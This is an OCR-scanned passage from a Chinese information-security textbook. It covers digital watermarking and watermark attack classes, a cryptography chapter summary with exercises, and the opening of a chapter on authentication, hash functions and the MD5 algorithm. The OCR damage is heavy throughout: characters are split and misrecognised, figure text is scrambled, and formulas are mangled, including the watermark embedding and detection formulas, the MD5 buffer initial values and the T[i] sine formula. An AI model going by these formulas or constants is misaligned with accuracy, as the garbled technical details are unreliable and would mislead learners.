钥 未 知 的 前 提 下 ,攻击 者 很 难 从 载体 信息 中 得 到 或 删除 ,甚至 发 现 秘密 信息 。 

3. 信息 隐藏 的 主要 分 支 

按 应 用 目的 和 载体 对 象 的 不 同 ,信息 隐藏 技术 可 分 为 许多 分 支 ,包括 隐 写 术 ,数字 水 印 、 
隐蔽 信道 、 阔 下 信道 、 低 截获 概率 通信 和 匿名 通信 等 。 主 要 是 隐 写 术 和 数字 水 印 。 

隐 写 术 (Steganography) 是 一 种 隐蔽 通信 技术 ,其 主要 目的 是 将 重要 的 信息 隐藏 起 来 ， 
以 便 不 引起 人 注意 地 进行 传输 和 存储 。 隐 写 术 在 其 发 展 过 程 中 逐渐 形成 了 语义 隐 写 和 技术 
隐 写 两 大 分 支 。 

数字 水 印 技术 是 信息 隐藏 技术 的 另 一 个 重要 分 支 , 它 的 基本 思想 是 在 数字 作品 (图 像 、 
音频 和 视频 等 ) 中 嵌入 秘密 信息 ,以 便 保 护 数字 产品 的 版 权证 明 产 品 的 真实 可 靠 性 .跟踪 资 
版 行为 。 其 中 的 秘密 信息 可 以 是 版 权 标 志 或 产品 相关 信息 。 

隐 写 术 和 数字 水 印 都 是 将 秘密 信息 隐藏 在 载体 对 象 中 ,但 还 是 有 本 质 的 不 同 。 在 隐 写 
术 应 用 中 ,所 要 发 送 的 秘密 信息 是 主体 ,是 重点 保护 对 象 ,而 用 什么 载体 对 对 象 进行 传输 无 
关 紧 要 。 对 于 数字 水 印 来 说 ,载体 通常 是 数字 产品 ,是 版 权 保护 对 象 ,而 所 嵌入 的 信息 则 是 
与 该 产品 相关 的 版 权 标志 或 相关 信息 。 


3.6.2 数字 水 印 


数字 水 印 (Digital Watermarking) 是 永久 镶嵌 在 其 他 数据 (宿主 数据 ) 中 的 具有 可 鉴别 
性 的 数字 信和 号 或 模式 ,并 且 不 影响 宿主 数据 的 可 用 性 。 它 通过 在 原始 数据 中 嵌入 秘密 信息 
来 证 明 该 数据 信息 的 所 有 权 。 
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数字 水 印 通 常 是 不 可 见 或 不 可 擦 的 , 它 与 原始 数据 (如 图 像 .音频 和 视频 数据 等 ) 紧 密 结 
合并 隐藏 其 中 ,成 为 原 数 据 不 可 分 离 的 一 部 分 。 数 字 水 印 技术 就 是 将 指定 的 数字 、 序 列 号 、 
文字 和 图 像 标 志 等 版 权 信 息 作 为 水 印 谋 入 到 数字 媒体 产品 中 ,并 在 需要 时 成 功 提取 秘密 消 
息 进行 验证 的 过 程 ,以 起 到 版 权 保护 、 秘 密 通信 数据 文 件 的 真 伪 鉴 别 和 产品 标识 等 作用 。 

1. 数字 水 印 的 通用 模型 

一 个 数字 水 印 方案 一 般 包括 三 个 基本 方面 : 水 印 的 生成 ,水 印 的 嵌入 和 水 印 的 提取 或 
检测 。 数 字 水 印 技术 实际 上 是 通过 对 水 印 载体 媒质 的 分 析 、 谋 入 信息 的 预 处 理 \ 信 息 授 入 点 
的 选择 .嵌入 方式 的 设计 嵌入 调制 的 控制 等 几 个 相关 技术 环节 进行 合理 优化 ,寻求 满足 不 
可 感知 性 \ 安 全 可 靠 性 、 稳 健 性 等 诸 条 件 约束 下 的 准 最 优化 设计 问题 。 数 字 水 印 一 般 包括 说 
人 和 检测 过 程 ,基本 框架 如 图 3. 24 和 图 3. 25 所 示 。 


水 印 生 成 数字 水 印 
算法 (O) (WW 


水 印 嵌 入 加 入 水 印 后 的 
原始 载体 数据 (1) 数据 0 


私 钥 / 公 钥 (K) 


图 3.24 水 印 嵌入 过 程 的 基本 框架 


嵌入 过 程 包括 数字 水 印 的 生成 和 嵌入 算法 。 水 印 生 成 算法 G 应 保证 水 印 的 唯一 性 有 
效 性 和 不 可 逆 性 等 属性 。 生 成 的 数字 水 印信 息 W 可 以 是 一 串 伪 随机 数 、 指 定 的 字符 串 、 图 
像 等 ,或 是 其 经 过 加 密 后 产生 的 信息 。 嵌 入 过 程 框架 的 输入 是 水 印信 息 W ,原始 载体 数据 I 
和 一 个 可 选 的 私 钥 / 公 钥 K。 密 钥 K 可 用 来 加 强 安全 性 ,以 避免 未 授权 的 恢复 和 修复 水 印 。 

水 印 的 嵌入 算法 很 多 ,多 为 空间 域 算法 和 变换 域 算法 。 由 图 3. 24 可 以 定义 水 印 嵌 入 过 
程 的 通用 公式 fw=E(GT, 克 ,KK)。 其 中 Iw 表示 嵌入 水 印 后 的 数据 ( 即 水 印 载体 数据 ) ,I 表示 
原始 载体 数据 ,W 表示 水 印 集合 ,K 表示 密 钥 集合 。 


数字 水 印 (0/ 
原始 数据 (D) 
1 
水 印 检测 估计 水 印 ( 防 )/ 
待 测 数据 四 一 一 一 一 | 算法 (D) | | 相似 度 检测 (Sim) 
下 
私 钥 / 公 钥 (K) 


图 3.25 水 印 检测 过 程 的 基本 框架 


由 图 3. 25 可 以 定义 水 印 检测 过 程 的 通用 公式 为 达 =D(Tw ,T,K)( 有 原始 载体 数据 1) 、 
亨 =D(Iw,I,K)( 有 原始 水 印 W) 和 议 =D(Tw,K)( 仅 有 密 钥 KK)。 其 中 , 矿 表示 估计 水 印 ， 
D 为 水 印 检测 算法 ,Tw 表示 受到 攻击 后 的 水 印 载体 数据 。 在 检测 过 程 中 需要 原始 数据 的 技 
术 称 为 明 水 印 ; 在 检测 过 程 中 只 需要 密 钥 ,不 需要 原始 数据 的 技术 称 为 盲 水 印 。 明 水 印 的 和 鲁 
棒 性 比较 强 ,但 存储 成 本 比较 高 ,目前 数字 水 印 大 多 数 是 盲 水 印 。 

检测 水 印 的 手段 可 以 分 为 两 种 : 一 是 在 有 原始 信息 的 情况 下 ,可 以 做 嵌入 信号 的 提取 
或 相关 性 验证 ;二 是 在 没有 原始 信息 情况 下 ,必须 对 嵌入 信息 做 全 搜索 或 分 布 假设 检验 等 。 
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对 于 随机 信号 或 伪 随 机 信号 ,证 明 检 测 信 号 是 水 印信 号 的 方法 一 般 就 是 做 相似 度 检验 。 水 
印 相似 度 (Sim) 检 验 的 通用 公式 为 : 


Sim = 或 ”Sim = 

2. 数字 水 印 的 分 类 

数字 水 印 按 嵌 入 信号 形式 可 以 分 为 一 维 水 印 和 多 维 水 印 ; 按 嵌入 方法 可 以 分 为 可 逆水 
印 和 不 可 道 水 印 ; 按 水 印 检测 方法 可 分 为 明 水 印 和 盲 水 印 ; 按 和 鲁 棒 性 可 分 为 易 脆 水 印 . 半 易 
脆 水 印 和 重 棒 水 印 ; 按 水 印 的 可 见 性 可 以 分 为 可 感知 的 (Perceptible) 和 不 易 感 知 的 
(Inperceptible) 两 种 ; 按 柑 入 的 载体 可 分 为 图 像 水 印 视频 水 印 .音频 水 印 和 文档 水 印 ; 按 水 
印 的 嵌入 域 可 分 为 空间 域 水 印 和 变换 域 水 印 ; 按 照 用 途 可 分 为 版 权 保护 水 印 . 算 改 提示 水 
印 .票据 防伪 水 印 .隐藏 标识 水 印 ,印刷 数字 水 印 和 身份 认证 水 印 等 。 

3. 典型 的 数字 水 印 算法 

(1) 空域 算法 。 该 算法 首先 把 一 个 密 钥 输入 到 一 个 wr 序列 发 生 器 中 以 产生 水 印信 号 ， 
然后 将 此 站 序列 重新 排列 成 二 维 水 印信 号 , 按 像素 点 逐一 插入 到 原始 声音 、 图 像 或 视频 等 
信号 中 作为 水 印 , 即 将 数字 水 印 通 过 某 种 算法 直接 释 加 到 图 像 等 信号 的 空间 域 中 。 由 于 水 
印信 号 被 安排 在 了 最 低位 上 ,因此 不 会 被 人 的 视觉 或 听觉 所 察觉 。 典 型 空域 方法 有 最 低 有 
效 位 方法 (Least Significant Bits，LSB) .Patchwork 法 和 文档 结构 微调 方法 。 

空域 数字 水 印 技术 的 优点 是 算法 简单 .速度 快 、 容 易 实 现 ,几乎 可 以 无 损 地 恢复 载体 图 
像 和 水 印信 息 。 其 缺点 是 太 脆弱 ,常用 的 信号 处 理 过 程 , 如 信号 的 缩放 、. 剪 切 等 都 可 以 破坏 
水 印 。 

(2) 变换 域 算法 。 该 类 算法 的 基本 思想 是 先 对 图 像 或 声音 信号 等 信息 进行 某 种 变换 
(如 正 交 变 换 ) ,在 变换 域 上 内 嵌入 水 印 , 然 后 经 过 反 变 换 而 成 为 含水 印 的 输出 。 这 些 变换 包 
括 基 于 奇异 值 分 解 变换 (SVD) ,离散 余弦 变换 (DCT) .小波 变换 CDWT) 和 傅 氏 变换 (FT 或 
FFT) 等 。 其 中 ,DCT 是 最 常用 的 变换 之 一 。 变 换 域 算法 具有 很 强 的 鲁 棒 性 ,能 有 效 地 抵抗 
剪裁 .压缩 等 各 种 信号 变形 。 在 频 域 中 嵌入 的 水 印信 号 能 量 可 以 分 布 到 所 有 像素 上 ,有 利于 
保证 水 印 的 不 可 见 性 。 但 算法 的 隐藏 和 提取 操作 复杂 ,运算 量 也 很 大 。 

(3) 压缩 域 算法 。 水 印 检测 与 提取 直接 在 压缩 域 数 据 中 进行 。 例 如 MPEG-2 压缩 视频 
数据 流 的 数字 水 印 方案 。 

4. 数字 水 印 应 用 

数字 水 印 技术 并 不 能 用 来 直接 阻止 非法 拷贝 行为 ,而 是 通过 验证 产品 的 所 有 权 来 揭 
露 非法 拷贝 ,传播 行为 ,用 法 律 间接 地 打击 盗版 者 ,非法 复制 等 企图 ,保护 知识 产权 。 承 
载 数字 水 印 的 数字 媒体 作品 可 以 是 数字 形式 的 图 片 . 音 视频 和 文档 等 ,秘密 消息 可 以 是 
版 权 标 志 、 用 户 序列 号 或 与 作品 相关 的 其 他 信息 。 数 字 水 印 应 用 系统 基本 组 成 如 图 3. 26 
所 示 。 

可 感知 的 数字 水 印 主要 用 于 当场 声明 对 产品 的 所 有 权 、 著 作 权 及 来 源 , 起 到 一 个 广告 宣 
传 或 约束 的 作用 。 比 如 电视 节目 播放 时 的 电视 台 半 透明 标志 。 不 易 感 知 的 数字 水 印 不 容易 
直接 感知 ,制作 难度 更 大 。 

数字 水 印 技术 与 其 他 防伪 技术 相 比 成 本 大 大 降低 ,很 容易 实现 产品 的 真 伪 鉴 别 。 数 字 
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密 钥 k 


水 印 提取 
算法 


原始 信息 水 印 w | 。， 
nl -[ 琴 
| 作品 Tr | i 


有 或 无 
水 印 生成 | | 水 印 嵌 入 水 印 攻击 水 印 检测 
算法 C 算法 算法 41 算法 D 


图 3.26 数字 水 印 处 理应 用 系统 基本 组 成 


水 印 是 数字 信号 处 理 、 图 像 处 理 \ 密 码 学 应 用 ,通信 理论 、 算 法 设计 等 学 科 的 交叉 领域 ,是 国 
际 学 术 界 的 研究 热点 之 一 。 数 字 水 印 技术 已 在 电子 商务 ,视频 点 播 、 在 线 或 离线 分 发 多 媒体 
内 容 、 远 程 教育 、 知 识 产权 保护 数字 产品 等 领域 得 到 了 广泛 的 应 用 。 

5. 数字 水 印 攻击 

目前 已 出 现 的 数字 水 印 攻击 方法 大 约 可 分 为 5 类 。 

(1) 简单 攻击 (Simple Attacks) 。 也 称 为 波形 攻击 或 噪声 攻击 ,就 是 通过 对 水 印 图 像 进 
行 某 种 操作 ,削弱 或 删除 嵌入 的 水 印 。 这 些 攻击 方法 包括 线性 或 非 线 性 滤波 .基于 波形 的 图 
像 压 缩 (JPEG、MPEG) ,添加 噪声 ,图像 裁减 .图像 量化 和 模拟 数字 转换 等 。 

(2) 同步 攻击 (Synchronization Attacks) 。 也 称 为 检测 失效 攻击 ,就 是 有 意 破坏 载体 数 
据 和 水 印 的 同步 性 ,试图 使 水 印 的 相关 检测 .恢复 失效 。 被 攻击 的 数字 作品 中 水 印 仍然 存 
在 ,但 是 水 印信 号 已 经 错位 ,不 能 维持 正常 水 印 提取 过 程 所 需要 的 同步 性 。 同 步 攻击 通常 采 
用 几何 变换 方法 ,如 缩放 ,平移 .旋转 、 剪 切 、 像 素 置换 和 二 次 抽样 化 等 。 

(3) 混 清 攻击 (Ambiguity Attacks)。 就 是 试图 生成 一 个 伪 源 数据 、 伪 水 印 化 数据 来 混 
活 含 有 真正 水 印 的 数字 作品 的 版 权 。 

(4) 删除 攻击 (Removal Attacks)。 就 是 分 析 、 估 计 、 分 离 并 删除 载体 中 的 水 印 。 常 见 
的 方法 有 合谋 攻击 (Collusion Attacks) 去 噪 、 确 定 的 非 线性 滤波 、 综 合 模型 压缩 等 。 

(5) 协议 攻击 。 在 已 加 水 印 版 权 的 载体 中 加 入 自己 的 水 印 ,并 声称 自己 的 版 权 。 


本 章 小 结 


密码 学 是 研究 如 何 实现 秘密 通信 的 科学 ,包括 密码 编码 学 和 密码 分 析 学 两 个 分 支 。 密 
码 编码 学 是 对 信息 进行 编码 实现 信息 保密 性 的 科学 ;而 密码 分 析 学 是 研究 、 分 析 、 破 译 密码 
的 科学 。 

密码 系统 分 类 按照 算法 的 保密 性 可 以 分 为 受 限制 的 算法 和 基于 密 钥 的 算法 。 基 于 密 钥 
的 算法 按照 密 钥 的 特点 分 为 对 称 算法 和 公开 密 钥 算法 。 

对 称 密码 算法 就 是 加 密 密 钥 和 解密 密 钥 相同 , 即 相互 易于 推算 或 实质 上 等 同 的 算法 , 按 
照明 文 的 处 理 方法 又 可 分 为 序列 密码 ( 流 密码 ) 和 分 组 密码 两 类 。 序 列 密码 算法 将 明文 逐 位 
转换 成 密 文 。 对 称 密码 的 典型 代表 是 现代 分 组 加 密 算法 ,如 DES( 数 据 加 密 标准 )、IDEA 
(国际 数据 加 密 算 法 ) 和 AES( 高 级 加 密 标 准 ) 等 算法 。DES 以 64 位 (二 进 制 ) 为 一 组 对 明文 
数据 加 密 , 输 出 64 位 密 文 。Rijndael 算法 即 AES 算法 ,其 明文 分 组 长 度 、 密 钥 长 度 可 以 是 
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128 位 、192 位 、256 位 中 的 任意 一 个 。 

公开 密 钥 算法 又 称 为 非 对 称 密 钥 算法 (Asymmetric Cipher) 或 双 密 钥 算法 ,其 加 密 密 
钥 和 解密 密 钥 不 相同 ,从 一 个 很 难 推出 男 一 个 。 其 中 一 个 公开 的 密 钥 叫 公 钥 , 另 一 个 保密 的 
密 钥 叫 私 钥 , 如 RSA .Elgamal、 椭 圆 曲 线 密码 (ECC) 等 。 公 钥 密 码 体 制 基于 单 向 陷 门 函数 。 

密码 体制 分 析 方法 按 攻击 技术 手段 可 分 为 穷 举 攻 击 、 统 计 分 析 攻 击 和 数学 分 析 攻击 
三 种 。 

所 谓 分 组 密码 的 工作 模式 就 是 以 该 分 组 密码 为 基础 构造 的 一 个 密码 系统 。 目 前 分 组 密 
码 的 工作 模式 包括 电码 本 (ECB) 、 密 码 分 组 链接 (CBC) 、 密 码 反馈 (CFB)、 输 出 反馈 (OFB)、 
级 连 (CM) .计数 器 、 分 组 链接 (BC) .扩散 密码 分 组 链接 (PCBCL) 明文 反馈 (PFB) 和 非 线 性 
函数 输出 反馈 (OFBNLF) 等 模式 。 

密 钥 管理 是 指 处 理 密 钥 自 产 生 到 最 终 销 毁 的 有 关 问 题 的 全 过 程 , 包 括 密 钥 的 生成 、 存 
储 、 分 配 ,更 新 .备份 .启用 与 恢复 、 停 用 与 撤销 、 销 毁 等 诸多 方面 。 密 钥 管 理 要 借助 加 密 、 认 
证 .签名 .协议 和 公证 等 技术 。 

新 型 密码 体制 如 量子 密码 .DNA 密码 混沌 密码 及 演化 密码 等 也 取得 了 较 好 的 研究 成 
果 , 有 着 良好 的 发 展 前 景 。 

信息 隐藏 (Information Hiding) 也 叫 数 据 隐 藏 (Data Hiding )、 信息 伪装 
(Steganography) ,主要 研究 如 何 将 某 一 机 密 信息 隐藏 于 另 一 公开 信息 的 载体 中 ,然后 通过 
公开 载体 的 信息 传输 来 传递 机 密 信息 。 信 息 隐 藏 技术 可 分 为 许多 分 支 ,包括 隐 写 术 ,数字 水 
印 和 隐蔽 信道 等 。 

数字 水 印 是 永久 镶嵌 在 其 他 数据 (宿主 数据 ) 中 的 具有 可 鉴别 性 的 数字 信号 ,并 且 不 影 
响 宿 主 数据 的 可 用 性 。 它 通过 在 原始 数据 中 嵌入 秘密 信息 来 证 明 该 数据 信息 的 所 有 权 。 


习题 3 


3.1 请 选择 一 篇 20 万 字 的 英文 小 说 ,统计 其 单字 母 出 现 的 频率 。 
3.2 举例 说 明代 替 与 置换 在 古典 密码 体制 中 的 作用 。 
3.3 在 一 次 一 密 体制 中 ,假定 下 列 位 串 是 随机 选择 的 密 钥 : 
下 三 (11001010001100111111110101110001011111110101010001) 
并 且 假 定 下 列 位 串 是 由 KK 加 密 所 得 : 
c=(10111001011110101111000101000001000100000101010010) 
试 找 出 明文 串 m( 设 C 是 由 M 与 K 按 位 模 2 加 得 到 的 )。 
请 用 playfair 矩阵 加 密 如 下 明文 : We are students, We all like our university! 
试 破译 IIVLC, 它 是 使 用 简单 换 位 密码 加 密 的 方式 。 
分 组 密码 的 主要 优点 是 什么 ”其 设计 原则 应 考虑 哪些 问题 ? 


ce 中 轴 必 


分 组 密码 代 换 与 置换 的 区 别 是 什么 ? 
随机 数 在 密码 算法 中 的 使 用 有 哪些 ? 简 述 DES 的 输出 反馈 模式 产生 随机 数 的 工作 
原理 。 


3.9 分 析 分 组 密码 3DES 与 DES 安全 强度 的 主要 区 别 。 
3.10 DES 密码 的 主要 弱点 有 哪些 ? 其 加 密 变换 与 解密 变换 有 何 关系 ? 
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13 
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-1 


密 钥 管理 的 原则 是 什么 ? 

对 称 密码 体制 的 密 钥 管理 策略 是 什么 ? 

对 称 密 钥 体制 下 密 钥 分 配 的 方法 有 哪些 ? 

公 钥 密码 体制 的 秘密 密 钥 的 分 配方 法 有 哪些 ? 

公 钥 密码 体制 的 公 钥 管理 策略 是 什么 ?如 何 实施 公开 密 钥 的 分 配 ? 
密 钥 托管 的 目的 是 什么 ? 简 述 密 钥 托管 的 工作 原理 。 

思考 混沌 密码 实现 中 存在 的 局 限 性 。 


数据 加 密 基 础 
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第 4 章 信息 认证 技术 
4.1 概 述 


保证 信息 的 完整 性 和 抗 否认 性 是 信息 安全 的 重要 内 容 , 主 要 通过 数字 签名 和 信息 认证 
来 实现 。 信 息 认 证 也 是 信息 安全 理论 的 重要 组 成 部 分 ,往往 是 安全 通信 和 访问 信息 系统 的 
第 一 道 防线 。 信 息 认 证 以 密码 理论 为 基础 ,同时 也 是 访问 控制 和 审计 的 前 提 , 因 此 对 网 络 环 
境 下 的 计算 机 系统 安全 尤其 重要 。 

1. 认证 的 定义 

认证 (Authentication) 就 是 对 于 证 据 信息 的 辨认 、 核 实 、 鉴 别 ,以 建立 某 种 信任 关系 ,是 
验证 系统 中 的 实体 是 否 真实 可 信 的 过程 ,是 防止 主动 攻击 的 重要 技术 。 信 息 认 证 就 是 对 信 
息 系统 中 的 主体 和 客体 进行 验证 、 确 认 的 过 程 , 包 括 对 信息 实体 的 完整 性 认证 和 操作 信息 实 
体 的 主体 对 象 的 身份 认证 。 

在 网 络 通信 中 认证 内 容 包 括 : 一 方面 是 验证 信息 的 发 送 者 (或 接收 者 ) 是 合法 的 而 不 是 
冒充 的 , 即 实体 身份 认证 ,包括 信 源 、 信 宿 的 识别 和 认证 ;二 是 验证 消息 的 完整 性 ,验证 数据 
在 传输 和 存储 过 程 中 是 否 被 自 改 、 重 放 或 延迟 等 。 涉 及 通信 的 双方 一 方 要 提供 证 据 或 标识 ， 
另 一 方 对 这 些 证 据 或 标识 的 有 效 性 加 以 辨认 核实、 鉴别 。 

2. 信息 认证 的 分 类 与 目的 

信息 认证 分 为 消息 认证 和 身份 认证 。 从 信息 认证 的 内 容 看 ,可 以 分 为 数据 (消息 或 
报 文 ) 认 证 和 身份 验证 ;从 认证 过 程 看 ,需要 有 证 据 符 (标识 ) 、 认 证 算法 和 认证 协议 三 个 
要 素 。 

认证 的 目的 有 两 个 方面 : 确认 信息 数据 的 真实 完整 性 ,防止 自 改 ;验证 访问 者 身份 的 授 
权 合法 性 ,防止 非 授权 访问 或 和 否认。 

3. 信息 认证 的 基础 

进行 信息 认证 需要 具有 以 下 几 方 面 的 条 件 作 为 基础 : 物理 基础 数学 基础 和 协议 基础 。 
物理 基础 是 指 信息 主体 或 客体 拥有 系统 承认 的 存储 或 携带 物理 载体 .拥有 系统 承认 的 标识 
( 符 ) 或 独一无二 的 特征 ,拥有 系统 承认 的 秘密 (或 密码 )。 数 学 基础 是 指数 学 或 密码 算法 , 包 
括 杂 次 函数 .数字 签名 等 。 协 议 基础 是 指 单 向 认证 、 双 向 认证 ,交叉 认证 和 多 方 认证 等 协议 。 

4. 认证 与 加 密 的 区 别 

加 密 用 以 确保 信息 数据 的 保密 性 ,阻止 敌手 的 被 动 攻击 ,如 截取 、 窃 听 。 认 证 用 以 确保 
信息 数据 的 真实 完整 性 ,确保 报 文 发 送 者 和 接收 者 的 真实 性 ,确保 使 用 者 的 授权 合法 性 及 抗 
否认 性 ,阻止 敌手 的 主动 攻击 ,如 冒充 、 自 改 和 重播 等 。 
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4.2 杂凑 函数 


杂凑 函数 是 进行 消息 完整 性 认证 的 重要 数学 基础 。 
4.2.1 杂凑 函数 概念 


杂凑 函数 ,也 称 为 Hash 函数 或 散 列 函 数 , 是 将 任意 长 的 输入 消息 作为 输入 ,生成 一 个 
固定 长 的 输出 串 的 函数 , 即 = 有 H(m)。 

其 中 输入 m 为 任意 变 长 报 文 或 消息 ;输出 为 定 长 的 散 列 值 串 , 称 为 该 消息 m 的 消息 
摘要 或 杂凑 码 ;H 即 变换 消息 的 函数 。 

Hash 函数 有 如 下 的 特点 或 要 求 : 

(1) 输出 定 长 。 互 函数 可 以 应 用 于 任意 长 度 的 数据 块 ,产生 固定 长 度 的 散 列 值 。 

(2) 易 计算 。 对 每 一 个 给 定 的 输入 mm, 计算 五 (>) 是 很 容易 的 。 

(3) 单 向 性 。 给 定 Hash 函数 的 描述 ,对 于 给 定 的 散 列 值 ,找到 满足 及 (m) 二 的 mm 
在 计算 上 是 不 可 行 的 (保证 攻击 者 无 法 通过 散 列 值 获得 消息 m)。 

(4) 弱 抗 碰 撞 性 。 给 定 Hash 函数 的 描述 ,对 于 给 定 的 消息 ma ,找到 满足 ms 隆 m 且 
HH(ms) 二 了 H(m) 的 ms 在 计算 上 是 不 可 行 的 (保证 攻击 者 无 法 实现 在 不 修改 散 列 值 的 情况 
下 替换 消息 ) 。 

(5) 强 抗 碰撞 性 。 给 定 Hash 函数 的 描述 ,找到 任何 满足 HGm) 二 HGms) 且 wma 关 ms 
的 消息 对 (mm ,ms) 在 计算 上 是 不 可 行 的 。 

Hash 函数 主要 用 于 为 文件 、 报 文 或 其 他 分 组 数据 产生 数字 指纹 ,只 要 输入 消息 有 任何 
变化 ,就 会 导致 不 同 的 散 列 值 输出 ,因此 将 Hash 函数 的 值 作为 认证 码 或 认证 标识 
(Authenticator) ,用 于 实现 消息 完整 性 认证 。 

一 般 Hash 函数 只 是 输入 消息 的 函数 ,无 须 输入 密码 ,在 Hash 函数 公开 的 情况 下 ,任何 
人 部 可 以 根据 输入 的 消息 计算 其 散 列 值 hn。 故 在 安全 通信 中 ,常常 需要 将 密 钥 或 秘密 信息 
与 Hash 函数 结合 起 来 对 消息 提供 认证 。 


4.2.2 Hash 函数 的 构造 形式 


关于 杂凑 函数 的 安全 性 设计 的 理论 主要 有 两 点 : 一 个 是 函数 的 单 向 性 ; 另 一 个 是 函数 
映射 的 随机 性 。 

Hash 函数 要 达到 上 述 两 点 ,其 构造 需要 利用 数学 难题 (如 因子 分 解 离 散 对 数 问题 
等 ) ;或 者 利用 某 些 对 称 密码 体制 (如 DES 等 ); 或 者 通过 直接 构造 复杂 的 非 线 性 关系 (如 
MD4、MD5 和 SHA-1 等 )。 

简单 杂凑 函数 可 以 如 下 构造 : 设 报 文 有 m 组 分 组 ,杂凑 码 C 有 nn 位 , 则 某 一 位 杂凑 码 
C; 可 以 这 样 简单 地 计算 : 

Ci:= Ba®@ Bz OB 
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复杂 Hash 函数 一 般 是 迭代 型 构造 的 ,其 一 般 结构 如 图 4. 1 所 示 。 和 迭代 型 Hash 函数 的 
结构 已 被 证 明 是 合理 的 。 如 果 采 用 其 他 结构 不 一 定安 全 。 大 多 数 新 的 Hash 函数 设计 只 是 
改进 了 这 种 结构 ,或 者 增加 了 Hash 码 长 。 


明文 M 被 分 为 L 个 分 组 
1 | | 


. Cr: 各 级 输出 ， 最 后 
作答 出 值 是 Hash 值 


0 这 Z| pa 
n n 


JI=CF Ch [61 4 
图 4.1 和 迭代 Hash 函数 的 一 般 构造 
Hash 算法 的 核心 技术 是 设计 无 碰撞 的 压缩 函数 f ,而 敌手 对 算法 的 攻击 重点 是 /的 内 
部 结构 ,由 于 / 和 分 组 密码 一 样 是 由 若干 轮 处 理 过 程 组 成 ,因此 对 y 的 攻击 需 通过 对 各 轮 
之 间 的 位 模式 的 分 析 来 进行 ,分 析 过 程 常 常 需要 先 找 出 / 的 碰撞 。 由 于 / 是 压缩 函数 ,其 
碰撞 是 不 可 避免 的 ,因此 在 设计 了 时 就 应 保证 找 出 其 碰撞 在 计算 上 是 不 可 行 的 。 
大 多 数 安全 的 散 列 函 数 都 采用 分 块 填充 链接 的 模式 (CBC) ,其 结构 是 迭代 型 的 。 


4.2.3 MDS 算法 


MD5 算法 是 一 种 单 向 散 列 函 数 ,1992 年 由 麻 省 理工 学 院 (MIT) 的 Ron Rivest 改进 自 
己 于 1990 年 设计 的 MD4 算法 完成 。MD 表示 消息 摘要 (Message Digest)。MD5 输入 消息 
可 任意 长 ,压缩 后 输出 为 128 位 。MD5 的 所 有 基本 运算 都 是 针对 32 位 运算 单元 的 。 算 法 
主要 过 程 如 图 4.2 所 示 。 


填充 (1 到 512 位 ) 消 息 长 度 (K mod 2%) 
Lx512 位 =Nx32 位 


128 位 摘要 


图 4.2 MD5 算法 框图 


1. 填充 
设 消息 Mo 的 长 度 值 K 为 | M0|, 附 加 P 十 64 位 到 M0, 使 |M1|==|M0| 十 |P|, 而 
IM|==|M1| 十 64 是 512 的 倍数 , 即 |M1| mod 512 二 448 mod 512。 如 果 |M0| 二 448 mod 
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512, 则 另 加 |P|==512。 如 果 K 大 于 2 , 则 取 K=|M0| mod 2%。 
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P 区 填充 100…00, 最 高 位 为 1, 其 他 位 为 0;64 位 区 存放 Mo 的 长 度 值 ;将 M 分 成 


组 进行 MD5 计算 ,每 组 512 位 . 输入 消息 可 任意 长 ,压缩 后 输出 为 128 位 。 
2. 分 组 


将 变换 后 的 消息 M 表示 一 系列 长 度 为 512 位 的 分 组 Yo ,Yi ,… ,YL-1, 而 每 一 分 组 又 可 
表示 为 16 个 32 位 长 的 字 。 这 样 消息 中 的 总 字数 为 N= 二 LX16, 因 此 消息 又 可 按 字 表示 为 


M[0,*, N—1], 
3. 初始 值 (IV) 的 初始 化 


MD5 中 有 4 个 32 位 缓冲 区 ,用 (A、B、C、D) 表 示 , 用 来 存储 散 列 计算 的 中 间 结 果 和 最 


终结 果 ,缓冲 区 中 的 值 被 称 为 链接 变量 ,如 图 4. 3 所 示 。 


首先 将 其 分 别 初始 化 为 A = 0x01234567, B = 二 4=l] 23 45 67 (0x674523[01]) 
B=89 AB CD EF (0xXEFCDAB89) 


Ox89abcdef, C=0xfedcba98,D=0x76543210。 


C=FE DC BA 98 (0x98BADCFE) 


4. 四 轮 循环 的 压缩 算法 D=76 54 32 flo| (0x 


10325476) 


以 分 组 为 单位 对 消息 进行 处 理 ,每 一 分 组 Y (gq 二 0,…， 


L 一 1) 都 经 一 压缩 函数 Huos 处理。 昌 vwos 是 算法 的 核心 ,其 图 4.3 初始 化 过 程 


中 又 有 4 轮 处 理 过 程 。 每 轮 的 输入 为 当前 处 理 的 消息 分 组 


Y, 和 缓冲 区 的 当前 值 A、B、C、D, 输 出 仍 放 在 缓冲 区 中 以 产生 新 的 A、B、C、D( 每 个 32 位 )。 


每 轮 输 出 为 128 位 ,如 图 4.4 所 示 。 


y, 的。 
512 4 B CE D 
下 尼 TI1…16], Xi] ) 
16 步 
人 B31 cI of 
GT[17…32], XMLp;( ) 
16 步 
41 B81 ct 可 
人 H,T[33:…48], XTp;O ) 
16 步 
4 中 Cc 2 
一 一 AT[49…64], XTps(i)] ) 
16 步 
| [LT 
+ 古 + + 
t 1 
1» 
Ci 


图 4.4 Hoyos 的 4 轮 迭 代 过 程 
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Hyns 的 4 轮 处 理 过 程 结构 一 样 ,但 所 用 的 逻辑 函数 不 同 , 分 别 表示 为 下.G、H、T。 每 轮 
又 要 进行 16 步 迭 代 运 算 ,4 轮 共 需 64 步 完 成 。 

Hu 算法 对 512 位 (16- 字 ) 组 进行 运算 ,Y, 表示 输入 的 第 g 组 512 位 数据 ,在 各 轮 中 参 
加 运算 。T[1,2,… ,64] 为 64 个 元 素 表 ,分 4 组 参与 不 同 轮 的 计算 。 

T[ 站 是 矩阵 中 第 i 个 字 , 其 值 是 2*Xabs(sin(i)) 的 整数 部 分 ,i 的 单位 是 弧度 ;可 用 32 
位 二 元 数 表 示 ,T 是 32 位 的 随机 数 源 。 即 : 

T[i] = INT(22 Xx abs (sin(7i))) 

其 中 ,0<abs(sin(?))1,T[ 疏 提供 了 随机 化 的 32 位 模式 ,消除 了 规律 性 。 

g 是 基本 人 逻辑 函数 中 下 .G、H、L 之 一 ,算法 中 每 一 轮 用 其 中 之 一 ;CLS, 是 对 32 位 整数 
循环 左 移 ;位 ;X[k] 二 MLqX16 十 &] 就 是 消息 的 第 某 512 位 组 的 第 人 个 32 位 字 ; 十 就 是 模 
加 法 。 压 缩 函 数 中 的 一 步 迭 代 如 图 4. 5 所 示 , 经 过 压缩 变换 更 新 缓冲 区 A、B、C、D。 


B © D 


~ 


XI 


TO] 


全 


B C D 


> ©-{8)-©- ©- -| 


图 4.5 压缩 函数 迭代 


其 中 ,基本 逻辑 函数 g 的 输入 是 B.C.D 缓冲 区 的 值 ,定义 如 表 4.1 所 示 ,X[kj 的 值 在 
